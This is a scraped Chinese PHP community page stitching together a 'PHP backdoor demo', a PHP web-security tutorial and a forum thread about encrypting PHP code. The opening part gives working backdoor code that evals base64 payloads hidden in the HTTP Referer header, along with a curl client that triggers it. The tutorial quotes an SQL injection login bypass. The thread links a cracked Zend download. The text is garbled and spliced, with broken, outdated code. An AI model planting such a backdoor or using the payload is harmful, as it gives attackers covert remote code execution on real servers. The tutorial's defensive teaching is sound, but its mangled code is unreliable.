php后门程序演示
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果。本地测试结果如下图。本程序只作为学习作用，请勿拿去做坏事。标签： &无&1&?php2//1.php3header('Content-type:text/ch...
   
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果。
本地测试结果如下图。
本程序只作为学习作用，请勿拿去做坏事。
标签： &无&
header('Content-type:text/charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'],&$a);
if(reset($a) ==&'10'&&&&count($a) == 9) {
&&&eval(base64_decode(str_replace(& &,&&+&, implode(array_slice($a, 6)))));
header('Content-type:text/charset=utf-8');
//要执行的代码
$code&= &&&CODE
phpinfo();
//进行base64编码
$code&=&base64_encode($code);
//构造referer字符串
$referer&=&&a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=&;
$url&=&'http://localhost/test1/1.php';
$ch&= curl_init();
$options&=&array(
&&&&CURLOPT_URL =&&$url,
&&&&CURLOPT_HEADER =& FALSE,
&&&&CURLOPT_RETURNTRANSFER =& TRUE,
&&&&CURLOPT_REFERER =&&$referer
curl_setopt_array($ch,&$options);
echo&curl_exec($ch);&
（责任编辑：phpcms）
本文关键字：
广告赞助商
最新视频推荐
Copyright (C) 2007-, All Rights Reserved 版权所有 . 沪ICP备号
地址:上海徐汇区零陵路585号 爱邦大厦26H座
传真(FAX):021-
电话(Tel):021-
PHP100 Website Powered by PHPCMS. For PHP100. 服务器维护：阿里巴巴-阿里云$okay = 0;
$username = $_POST['user'];
$pw = $_POST['pw'];
$sql = “select count(*) as ctr from users where
username=’”.$username.”‘ and password=’”. $pw.”‘ limit 1″;
$result = mysql_query($sql);
while ($data = mysql_fetch_object($result)){
if ($data-&ctr == 1){
&&//they’re okay to enter the application!
&&$okay = 1;
if ($okay){
$_SESSION['loginokay'] =
header(”index.php”);
header(”login.php”);
这段代码看起来没问题，对吗？世界各地成百（甚至成千）的 PHP/MySQL 站点都在使用这样的代码。它错在哪里？好，记住 “不能信任用户输入”。这里没有对来自用户的任何信息进行转义，因此使应用程序容易受到攻击。具体来说，可能会出现任何类型的 SQL 注入攻击。
例如，如果用户输入 foo 作为用户名，输入 ‘ or ‘1′=’1 作为密码，那么实际上会将以下字符串传递给 PHP，然后将查询传递给 MySQL：
$sql = “select count(*) as ctr&&from users where
&&username=’foo’ and password=” or ‘1′=’1′ limit 1″;&
这个查询总是返回计数值 1，因此 PHP 会允许进行访问。通过在密码字符串的末尾注入某些恶意 SQL，黑客就能装扮成合法的用户。
解决这个问题的办法是，将 PHP 的内置 mysql_real_escape_string() 函数用作任何用户输入的包装器。这个函数对字符串中的字符进行转义，使字符串不可能传递撇号等特殊字符并让 MySQL 根据特殊字符进行操作。清单 7 展示了带转义处理的代码。
清单 7. 的 PHP 表单处理代码
& && && && && && &&
[php] $okay = 0;
$username = $_POST['user'];
$pw = $_POST['pw'];
$sql = “select count(*) as ctr from users where
&&username=’”.mysql_real_escape_string($username).”‘
&&and password=’”. mysql_real_escape_string($pw).”‘ limit 1″;
$result = mysql_query($sql);
while ($data = mysql_fetch_object($result)){
if ($data-&ctr == 1){
&&//they’re okay to enter the application!
&&$okay = 1;
if ($okay){
$_SESSION['loginokay'] =
header(”index.php”);
header(”login.php”);
使用 mysql_real_escape_string() 作为用户输入的包装器，就可以避免用户输入中的任何恶意 SQL 注入。如果用户尝试通过 SQL 注入传递畸形的密码，那么会将以下查询传递给：
select count(*) as ctr from users where \
username=’foo’ and password=’\’ or \’1\’=\’1′ limit 1″&
中没有任何东西与这样的密码匹配。仅仅采用一个简单的步骤，就堵住了 Web 应用程序中的一个大漏洞。这里得出的经验是，总是应该对 SQL 查询的用户输入进行转义。
但是，还有几个漏洞需要堵住。下一项是操纵 GET 变量。
防止用户操纵 变量
在前一节中，防止了用户使用畸形的密码进行登录。如果您很聪明，应该应用您学到的方法，确保对 SQL 语句的所有用户输入进行转义。
但是，用户现在已经地登录了。用户拥有有效的密码，并不意味着他将按照规则行事 —— 他有很多机会能够造成损害。例如，应用程序可能允许用户查看特殊的内容。所有链接指向 template.php?pid=33 或 template.php?pid=321 这样的位置。URL 中问号后面的部分称为查询字符串。因为查询字符串直接放在 URL 中，所以也称为 GET 查询字符串。
在 PHP 中，如果禁用了 register_globals，那么可以用 $_GET['pid'] 访问这个字符串。在 template.php 页面中，可能会执行与清单 8 相似的操作。
清单 8. 示例 template.php
& && && && && && &&
[php] $pid = $_GET['pid'];
//we create an object of a fictional class Page
$obj = new P
$content = $obj-&fetchPage($pid);
//and now we have a bunch of PHP that displays the page
这里有什么错吗？首先，这里隐含地相信来自浏览器的 GET 变量 pid 是的。这会怎么样呢？大多数用户没那么聪明，无法构造出语义攻击。但是，如果他们注意到浏览器的 URL 位置域中的 pid=33，就可能开始捣乱。如果他们输入另一个数字，那么可能没问题；但是如果输入别的东西，比如输入 SQL 命令或某个文件的名称（比如 /etc/passwd），或者搞别的恶作剧，比如输入长达 3,000 个字符的数值，那么会发生什么呢？
在这种情况下，要记住基本规则，不要信任用户输入。应用程序开发人员知道 template.php 接受的个人标识符（PID）应该是数字，所以可以使用 PHP 的 is_numeric() 函数确保不接受非数字的 PID，如下所示：
清单 9. 使用 is_numeric() 来限制 GET 变量
& && && && && && &&
[php] $pid = $_GET['pid'];
if (is_numeric($pid)){
//we create an object of a fictional class Page
$obj = new P
$content = $obj-&fetchPage($pid);
//and now we have a bunch of PHP that displays the page&
//didn’t pass the is_numeric() test, do something else!
}?& [/php]
这个方法似乎是有效的，但是以下这些输入都能够轻松地通过 is_numeric() 的检查：
100 （有效）
100.1 （不应该有小数位）
+ （科学计数法 —— 不好）
0xff33669f （十六进制 —— 危险！危险！）
那么，有意识的 PHP 开发人员应该怎么做呢？多年的经验表明，最好的做法是使用正则表达式来确保整个 GET 变量由数字组成，如下所示：
清单 10. 使用正则表达式限制 GET 变量
& && && && && && &&
[php] $pid = $_GET['pid'];
if (strlen($pid)){
if (!ereg(”^[0-9]+$”,$pid)){
&&//do something appropriate, like maybe logging \
&&them out or sending them back to home page
//empty $pid, so send them back to the home page
//we create an object of a fictional class Page, which is now
//moderately protected from evil user input
$obj = new P
$content = $obj-&fetchPage($pid);
//and now we have a bunch of PHP that displays the page&
需要做的只是使用 strlen() 检查变量的长度是否非零；如果是，就使用一个全数字正则表达式来确保数据元素是有效的。如果 PID 包含字母、斜线、点号或任何与十六进制相似的内容，那么这个例程捕获它并将页面从用户活动中屏蔽。如果看一下 Page 类幕后的情况，就会看到有意识的 PHP 开发人员已经对用户输入 $pid 进行了转义，从而保护了 fetchPage() 方法，如下所示：
清单 11. 对 fetchPage() 方法进行转义
& && && && && && &&
[php] class Page{
&&function fetchPage($pid){
&&$sql = “select pid,title,desc,kw,content,\
&&status from page where pid=’
&&”.mysql_real_escape_string($pid).”‘”;
&&//etc, etc….
您可能会问，“既然已经确保 PID 是数字，那么为什么还要进行转义？” 因为不知道在多少不同的上下文和情况中会使用 fetchPage() 方法。必须在调用这个方法的所有地方进行保护，而方法中的转义体现了纵深防御的意义。
如果用户尝试输入非常长的数值，比如长达 1000 个字符，试图发起缓冲区溢出攻击，那么会发生什么呢？下一节更详细地讨论这个问题，但是目前可以添加另一个检查，确保输入的 PID 具有正确的长度。您知道的 pid 字段的最大长度是 5 位，所以可以添加下面的检查。
清单 12. 使用正则表达式和长度检查来限制 GET 变量
& && && && && && &&
[php] $pid = $_GET['pid'];
if (strlen($pid)){
if (!ereg(”^[0-9]+$”,$pid) && strlen($pid) & 5){
&&//do something appropriate, like maybe logging \
&&them out or sending them back to home page
//empty $pid, so send them back to the home page
//we create an object of a fictional class Page, which is now
//even more protected from evil user input
$obj = new P
$content = $obj-&fetchPage($pid);
//and now we have a bunch of PHP that displays the page&
现在，任何人都无法在应用程序中塞进一个 5,000 位的数值 —— 至少在涉及 GET 字符串的地方不会有这种情况。想像一下黑客在试图突破您的应用程序而遭到挫折时咬牙切齿的样子吧！而且因为关闭了错误报告，黑客更难进行侦察。
缓冲区溢出攻击
缓冲区溢出攻击 试图使 PHP 应用程序中（或者更精确地说，在 Apache 或底层操作系统中）的内存分配缓冲区发生溢出。请记住，您可能是使用 PHP 这样的高级语言来编写 Web 应用程序，但是最终还是要调用 C（在 Apache 的情况下）。与大多数低级语言一样，C 对于内存分配有严格的规则。
缓冲区溢出攻击向缓冲区发送大量数据，使部分数据溢出到相邻的内存缓冲区，从而破坏缓冲区或者重写逻辑。这样就能够造成拒绝服务、破坏数据或者在远程服务器上执行恶意代码。
防止缓冲区溢出攻击的惟一方法是检查所有用户输入的长度。例如，如果有一个表单元素要求输入用户的名字，那么在这个域上添加值为 40 的 maxlength 属性，并在后端使用 substr() 进行检查。清单 13 给出表单和 PHP 代码的简短示例。
清单 13. 检查用户输入的长度
& && && && && && &&
[php] if ($_POST['submit'] == “go”){
$name = substr($_POST['name'],0,40);
//continue processing….
<form action="”&?php" echo="" \ $_SERVER['PHP_SELF'];?&” method=”post”&
“name” id=”name” size=”20″ maxlength=”40″/&
为什么既提供 maxlength 属性，又在后端进行 substr() 检查？因为纵深防御总是好的。浏览器防止用户输入 PHP 或 MySQL 不能地处理的超长字符串（想像一下有人试图输入长达 1,000 个字符的名称），而后端 PHP 检查会确保没有人远程地或者在浏览器中操纵表单数据。
正如您看到的，这种方式与前一节中使用 strlen() 检查 GET 变量 pid 的长度相似。在这个示例中，忽略长度超过 5 位的任何输入值，但是也可以很容易地将值截短到适当的长度，如下所示：
清单 14. 改变输入的 GET 变量的长度
& && && && && && &&
[php] $pid = $_GET['pid'];
if (strlen($pid)){
if (!ereg(”^[0-9]+$”,$pid)){
&&//if non numeric $pid, send them back to home page
//empty $pid, so send them back to the home page
//we have a numeric pid, but it may be too long, so let’s check
if (strlen($pid)&5){
&&$pid = substr($pid,0,5);
//we create an object of a fictional class Page, which is now
//even more protected from evil user input
$obj = new P
$content = $obj-&fetchPage($pid);
//and now we have a bunch of PHP that displays the page&
注意，缓冲区溢出攻击并不限于长的数字串或字母串。也可能会看到长的十六进制字符串（往往看起来像 \xA3 或 \xFF）。记住，任何缓冲区溢出攻击的目的都是淹没特定的缓冲区，并将恶意代码或指令放到下一个缓冲区中，从而破坏数据或执行恶意代码。对付十六进制缓冲区溢出最简单的方法也是不允许输入超过特定的长度。
如果您处理的是允许在中输入较长条目的表单文本区，那么无法在客户端轻松地限制数据的长度。在数据到达 PHP 之后，可以使用正则表达式清除任何像十六进制的字符串。
清单 15. 防止十六进制字符串
& && && && && && &&
[php] if ($_POST['submit'] == “go”){
$name = substr($_POST['name'],0,40);
//clean out any potential hexadecimal characters
$name = cleanHex($name);
//continue processing….
function cleanHex($input){
$clean = preg_replace(”![\][xX]([A-Fa-f0-9]{1,3})!”, “”,$input);
” method=”post”&
您可能会发现这一系列操作有点儿太严格了。毕竟，十六进制串有合法的用途，比如输出外语中的字符。如何部署十六进制 regex 由您自己决定。比较好的策略是，只有在一行中包含过多十六进制串时，或者字符串的字符超过特定数量（比如 128 或 255）时，才删除十六进制串。
跨站点脚本攻击
在跨站点脚本（XSS）攻击中，往往有一个恶意用户在表单中（或通过其他用户输入方式）输入信息，这些输入将恶意的客户端标记插入过程或中。例如，假设站点上有一个简单的来客登记簿程序，让访问者能够留下姓名、电子邮件地址和简短的消息。恶意用户可以利用这个机会插入简短消息之外的东西，比如对于其他用户不合适的图片或将用户重定向到另一个站点的 JavaScript，或者窃取 cookie 信息。
幸运的是，PHP 提供了 strip_tags() 函数，这个函数可以清除任何包围在 HTML 标记中的内容。strip_tags() 函数还允许提供允许标记的列表，比如
清单 16 给出一个示例，这个示例是在前一个示例的基础上构建的。
清单 16. 从用户输入中清除 HTML 标记
& && && && && && &&
[php] if ($_POST['submit'] == “go”){
//strip_tags
$name = strip_tags($_POST['name']);
$name = substr($name,0,40);
//clean out any potential hexadecimal characters
$name = cleanHex($name);
//continue processing….
function cleanHex($input){
$clean = preg_replace\
(”![\][xX]([A-Fa-f0-9]{1,3})!”, “”,$input);
“” method=”post”&
“text” name=”name” id=”name” size=”20″ maxlength=”40″/&
从的角度来看，对公共用户输入使用 strip_tags() 是必要的。如果表单在受保护区域（比如内容管理系统）中，而且您相信用户会正确地执行他们的任务（比如为 Web 站点创建 HTML 内容），那么使用 strip_tags() 可能是不必要的，会影响工作效率。
还有一个问题：如果要接受用户输入，比如对贴子的评论或来客登记项，并需要将这个输入向其他用户显示，那么一定要将响应放在 PHP 的 htmlspecialchars() 函数中。这个函数将与符号、& 和 & 符号转换为 HTML 实体。例如，与符号（&）变成 &。这样的话，即使恶意内容躲开了 strip_tags() 的处理，也会在后端被 htmlspecialchars() 处理掉。
浏览器内的数据操纵
有一类浏览器插件允许用户篡改页面上的头部元素和表单元素。使用 Tamper Data（一个 Mozilla 插件），可以很容易地操纵包含许多隐藏文本字段的简单表单，从而向 PHP 和 MySQL 发送指令。
用户在点击表单上的 Submit 之前，他可以启动 Tamper Data。在提交表单时，他会看到表单数据字段的列表。Tamper Data 允许用户篡改这些数据，然后浏览器完成表单提交。
让我们回到前面建立的示例。已经检查了字符串长度、清除了 HTML 标记并删除了十六进制字符。但是，添加了一些隐藏的文本字段，如下所示：
清单 17. 隐藏变量
& && && && && && &&
[php] if ($_POST['submit'] == “go”){
//strip_tags
$name = strip_tags($_POST['name']);
$name = substr($name,0,40);
//clean out any potential hexadecimal characters
$name = cleanHex($name);
//continue processing….
function cleanHex($input){
$clean = \
preg_replace(”![\][xX]([A-Fa-f0-9]{1,3})!”, “”,$input);
”” method=”post”&
“text” name=”name” id=”name” size=”20″ maxlength=”40″/&
注意，隐藏变量之一暴露了表名：users。还会看到一个值为 create 的 action 字段。只要有基本的 SQL 经验，就能够看出这些命令可能控制着中间件中的一个 SQL 引擎。想搞大破坏的人只需改变表名或提供另一个选项，比如 delete。
图 1 说明了 Tamper Data 能够提供的破坏范围。注意，Tamper Data 不但允许用户访问表单数据元素，还允许访问 HTTP 头和 cookie。
图 1. Tamper Data 窗口
要防御这种工具，最简单的方法是假设任何用户都可能使用 Tamper Data（或类似的工具）。只提供系统处理表单所需的最少量的信息，并把表单提交给一些专用的逻辑。例如，注册表单应该只提交给注册逻辑。
如果已经建立了一个通用表单处理函数，有许多页面都使用这个通用逻辑，那该怎么办？如果使用隐藏变量来控制流向，那该怎么办？例如，可能在隐藏表单变量中指定写哪个表或使用哪个文件存储库。有 4 种选择：
不改变任何东西，暗自祈祷系统上没有任何恶意用户。
重写功能，使用更的专用表单处理函数，避免使用隐藏表单变量。
使用 md5() 或其他加密机制对隐藏表单变量中的表名或其他敏感信息进行加密。在 PHP 端不要忘记对它们进行解密。
通过使用缩写或昵称让值的含义模糊，在 PHP 表单处理函数中再对这些值进行转换。例如，如果要引用 users 表，可以用 u 或任意字符串（比如 u8y90×0jkL）来引用它。
后两个选项并不完美，但是与让用户轻松地猜出中间件逻辑或数据模型相比，它们要好得多了。
现在还剩下什么问题呢？远程表单提交。
远程表单提交
Web 的好处是可以分享信息和服务。坏处也是可以分享信息和服务，因为有些人做事毫无顾忌。
以表单为例。任何人都能够访问一个 Web 站点，并使用浏览器上的 File & Save As 建立表单的本地副本。然后，他可以修改 action 参数来指向一个完全限定的 URL（不指向 formHandler.php，而是指向/formHandler.php，因为表单在这个站点上），做他希望的任何修改，点击 Submit，服务器会把这个表单数据作为合法通信流接收。
首先可能考虑检查 $_SERVER['HTTP_REFERER']，从而判断请求是否来自自己的服务器，这种方法可以挡住大多数恶意用户，但是挡不住最高明的黑客。这些人足够聪明，能够篡改头部中的引用者信息，使表单的远程副本看起来像是从您的服务器提交的。
处理远程表单提交更好的方式是，根据一个惟一的字符串或时间戳生成一个令牌，并将这个令牌放在会话变量和表单中。提交表单之后，检查两个令牌是否匹配。如果不匹配，就知道有人试图从表单的远程副本发送数据。
要创建随机的令牌，可以使用 PHP 内置的 md5()、uniqid() 和 rand() 函数，如下所示：
清单 18. 防御远程表单提交
& && && && && && &&
[php] session_start();
if ($_POST['submit'] == “go”){
//check token
if ($_POST['token'] == $_SESSION['token']){
&&//strip_tags
&&$name = strip_tags($_POST['name']);
&&$name = substr($name,0,40);
&&//clean out any potential hexadecimal characters
&&$name = cleanHex($name);
&&//continue processing….
&&//stop all processing! remote form posting attempt!
$token = md5(uniqid(rand(), true));
$_SESSION['token']= $
function cleanHex($input){
$clean = preg_replace(”![\][xX]([A-Fa-f0-9]{1,3})!”, “”,$input);
” method=”post”&
<input type="”hidden”" name="”token”" value="””/&
这种技术是有效的，这是因为在 PHP 中会话数据无法在服务器之间迁移。即使有人获得了您的 PHP 源代码，将它转移到自己的服务器上，并向您的服务器提交信息，您的服务器接收的也只是空的或畸形的会话令牌和原来提供的表单令牌。它们不匹配，远程表单提交就失败了。
本讨论了许多问题：
使用 mysql_real_escape_string() 防止 SQL 注入问题。
使用正则表达式和 strlen() 来确保 GET 数据未被篡改。
使用正则表达式和 strlen() 来确保用户提交的数据不会使内存缓冲区溢出。
使用 strip_tags() 和 htmlspecialchars() 防止用户提交可能有害的 HTML 标记。
避免系统被 Tamper Data 这样的工具突破。
使用惟一的令牌防止用户向服务器远程提交表单。
本没有涉及更高级的主题，比如文件注入、HTTP 头欺骗和其他漏洞。但是，您学到的知识可以帮助您马上增加足够的性，使当前项目更。
转载请注明来源：关注 第一PHP社区 微信公众号，获取更多最新PHP技术分享打酱油震惊呵呵赞鄙视标签： ,,注：与内容无关的评论将被删除，严重者禁用帐号！ | 最新评论不吐不快，赶紧来一发！栏目推荐关注 第一PHP社区 微信公众号热门点击本站推荐
| 中国最专业的PHP中文社区 |
Copyright (C) 1998 - . All Rights Reserved
第一PHP社区
版权所有 快云为本站提供专业云计算服务 &&&&&PHP程序如何保护自己的版权？_Php问答2_PHP技术问答_最全面的网站教程
当前位置：&&&&&&PHP程序如何保护自己的版权？
PHP程序如何保护自己的版权？
不被修改和未授权使用？？
______________________________________________________________________________________________
不被修改: 那你用zend软件编码一下.
未授权使用:自己加一些设置,比如满足条件就让使用或删除自身.
______________________________________________________________________________________________
加密加密再加密..........
______________________________________________________________________________________________
______________________________________________________________________________________________
加密,很多人都用zend
______________________________________________________________________________________________
______________________________________________________________________________________________
什么是加密啊?我不懂,
______________________________________________________________________________________________
加密.zend 要钱的.
______________________________________________________________________________________________
ZEND加密啊
______________________________________________________________________________________________
有免费的，
______________________________________________________________________________________________
破解版/download/s/2287.asp
______________________________________________________________________________________________
晕啊，既然是开元的东西，为什么还有加密啊，就像唠叨老大以前说的一样，php写的东西，他一看就知道怎么实现的了。你还保密有什么用啊？无聊。
______________________________________________________________________________________________
to hahawen(变态的大龄青年, 越来越变态，咋办啊)
“他一看就知道怎么实现的了”，并不代表“他一看同样功能的代码就出来了”哦
______________________________________________________________________________________________
hahawen(变态的大龄青年, 越来越变态，咋办啊)
我就不信他一看那加了密的源码他也知道是怎么实现的!
______________________________________________________________________________________________
就算是最蹩脚的密码验证(在文件当中直接验证)
if($_["user"] == "admin" && $_["pws"] == "abc"){
经过zend加密后,也是超级无敌的,帐号密码根本不用放到数据库当中,就算放到虚拟主机上,被那些有小偷小摸习惯的主机商偷了来用,也是毫无用处的
知道zend的厉害了吧~
______________________________________________________________________________________________
没有试过加密，大家说的是不是对php源码加密呢？
______________________________________________________________________________________________
to shuzai() :cfankings(极品菜鸟)
网站设计的实现方式和技术就那么几种，要了解你是怎么设计的，操作几遍你得东东就可以了，还用看代码？？？？？？？？？？？？？你们当你们写都是什么东西啊。
技术的根本不是问题。
______________________________________________________________________________________________
晕啊，既然是开元的东西，为什么还有加密啊，就像唠叨老大以前说的一样，php写的东西，他一看就知道怎么实现的了。你还保密有什么用啊？无聊。
______________________________________________________________________________________________
开元并不等同免费。
其实加密是无奈之举。要是大家都能如圣人般高尚，只要授权就可以了，可是胜任毕竟少数。
______________________________________________________________________________________________
Open Source 和 Free 当然是两码事~~~
if(开源==免费)
开源.toDead();
加密是一种保护知识产权的手段~~类似这样的开源实际上也很多~~
“你可以免费的使用这个软件，如果希望获得源代码并应用到你的程序中请购买授权。”
______________________________________________________________________________________________
谢谢各位。。我明白了。。呵呵
PHP保密行不通。。放弃这一选择。。
______________________________________________________________________________________________
同意商业应用程序加密
毕竟那里耗费了程序员太多的心血
一般的就别加了
想学。NET，可基本都编译了。
自己学找点源代码都找不到好的。真是的
上一篇：下一篇：